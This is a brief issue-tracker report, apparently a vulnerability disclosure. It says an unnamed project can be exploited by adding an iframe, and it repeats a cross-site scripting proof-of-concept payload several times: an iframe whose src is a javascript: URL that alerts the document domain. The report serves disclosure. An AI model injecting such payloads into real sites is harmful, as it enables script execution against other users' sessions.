Open francoborrelli opened 4 years ago
I found that you can exploit this vulnerability simply by adding an iframe <iframe src="javascript:alert(document.domain)"</iframe>
<iframe src="javascript:alert(document.domain)"</iframe>
I found that you can exploit this vulnerability simply by adding an iframe
<iframe src="javascript:alert(document.domain)"</iframe>